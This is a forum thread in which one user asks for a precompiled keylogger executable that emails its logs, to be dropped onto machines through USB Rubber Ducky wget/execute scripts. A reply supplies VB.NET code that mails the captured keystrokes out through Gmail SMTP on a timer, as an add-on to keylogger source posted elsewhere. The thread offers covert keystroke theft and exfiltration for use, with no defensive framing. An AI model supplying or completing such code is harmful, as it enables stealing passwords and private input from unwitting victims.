Jump to content

Compiling .exe keylogger for use with Ducky


Doje

Recommended Posts

Hey All,

I am trying to compile a standalone .exe for use with some of the wget / execute ducky scripts.

As I have been out of the windows game a while, I was wondering if someone could suggest a keylogger that I can precompile with an email address for the log files. Obviously I do not want to fiddle with a GUI because that totally defeats the purpose of using a Duck in the first place.

Any help is appreciated!

D

Link to comment
Share on other sites

well if you want a "Free" keylogger i posted the source to a i guess decent to a point but if said user types fast then it will have a hard time picking up what he/she types it better to use a keyboardhook you can just modify the source i posted you can modify it just add this in on a timer

imports system.net.mail

Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient("smtp.gmail.com")
mail.From = New MailAddress("@gmail.com")
mail.To.Add("The email in witch the data will be sent")
mail.Subject = ""
mail.Body = ""

SmtpServer.Port = 587
SmtpServer.Credentials = New System.Net.NetworkCredential("Email", "Pass")
SmtpServer.EnableSsl = True

SmtpServer.Send(mail)

-Hex

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...